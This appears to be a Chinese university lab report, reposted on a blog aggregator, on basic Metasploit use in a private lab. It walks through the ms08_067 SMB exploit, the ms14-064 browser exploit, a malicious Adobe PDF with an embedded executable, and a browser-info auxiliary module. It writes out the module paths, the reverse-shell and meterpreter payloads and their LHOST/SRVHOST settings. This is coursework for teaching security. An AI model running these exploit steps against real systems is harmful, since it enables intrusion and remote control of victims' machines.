zoukankan      html  css  js  c++  java
  • Exp5 MSF基础应用

    20154331 Exp5 MSF基础应用

    实验内容:

    1、主动攻击:ms08_067。

    首先我们用 search ms08-067查看漏洞信息。

    我们发现就只有一个工具,于是乎调用它,使用 use exploit/windows/smb/ms08_067_netapi.

    然后键入show payloads看一下我们需要的payload

    然后我们输入set payload generic/shell_reverse_tcp选择病毒模块。然后show option 查看相应的信息。

    然后我们设置相应的参数,LHOST是主机,RHOST是靶机。

    主机ip为192.168.116.131

    靶机ip为192.168.116.134

    回连成功了!

    然后我尝试是在主机下与自己ping,结果能ping通,主动攻击成功!!!

    2、针对浏览器的攻击,ms14-064.

       首先在微软的官网上上到14-064以及了解相关信息。决定用这个。

      

    在msf中search ms14-064, 看到三个工具。

    然后我们选择用第一个模块:use exploit/windows/browser/ms14_064_ole_code_execution.

    并反向链接:payload windows/meterpreter/reverse_tcp。

    然后输入:show options配置一下参数。

    由于这个实验是第二天做的,主机的ip地址又变成了192.168.116.135.我们来配置一下参数:

    AllowPowershellprompt改为true:set AllowPowershellPrompt true

    LHOST---攻击机的IP地址:set LHOST 192.168.116.135

    SRVHOST---攻击机的IP地址:set SRVHOST 192.168.116.135

    exploit.

    exploit攻击后会生成带有攻击性的URL,这里生成的URL为:http://192.168.0.203:8080/fuiYPGD3cKdbp,

    URL发到winxp上用winxp的ie浏览器打开:

    回到msf,我们可以看到有攻击绘画的建立,得到一个session 2,(1是我之前一次建立的,不用管他)利用这个绘画便得到了meterpreter,输入指令获取winxp的信息

    攻击成功!!!!

    攻击成功!!!

    3、针对客户端的攻击:adobe

     首先和之前一样用search命令查找对该漏洞的攻击模块:search adobe

    我选取的是下面蓝框的:use exploit/windows/fileformat/adobe_pdf_embedded_exe.

    然后查看需要的设置和可以攻击的靶机类型:

    输入:show options

     然后exploit生成:

    输入:use exploit/multi/handler 进入handler模式,然后exploit

    我们输入抓屏指令:screenshot试试

    成功了!!!!

    4、成功应用任何一个辅助模块。

     用show auxiliary查看所有辅助模块,并选择其中的一个,选的是 gather/browser_info

     然后输入 :show options查看需要修改的信息:

    修改主机IP地址:set SRVHOST 192.168.116.135

    生成一个usl,我们把这个网址复制到winxp靶机上用浏览器打开:

     

     上钩了:

    基础问题回答:

    (1)用自己的话解释什么是exploit,payload,encode.

    exploit是生成或启动已经设置好的攻击程序,获得相应权限。在实验中,exploit生成了PDF文件来将被攻击主机的shell传送给在监听的Kali;生成了一个网站服务器,被攻击者连接时可被攻击;直接攻击win7主机等。
         payload是指将恶意代码包装成可插入到目标主机的东西。
         encode是指编码,去掉一些无用的字符或改变自己的特征码。

    实验体会:

    这是第五次实验MSF基础应用,这次争对具体主机进行攻击,原来漏洞那么多,看来还是要及时修补漏洞才是真的,什么网络链接之类的都不敢再点了,哈哈哈,不过还是收获很多的。

     

  • 相关阅读:
    JavaMail入门第四篇 接收邮件
    JavaMail入门第三篇 发送邮件
    JavaMail入门第二篇 创建邮件
    JavaMail入门第一篇 邮件简介及API概述
    Java对象数组
    Mybatis Dao层注解及XML组合Dao的开发方式
    spring mvc常用注解总结
    组建自己的局域网(可以将PC机实现为服务器)
    局域网 FTP建立,搭建一个简易的局域网服务器
    公司局域网搭建
  • 原文地址:https://www.cnblogs.com/20154331huangrui/p/8881038.html
Copyright © 2011-2022 走看看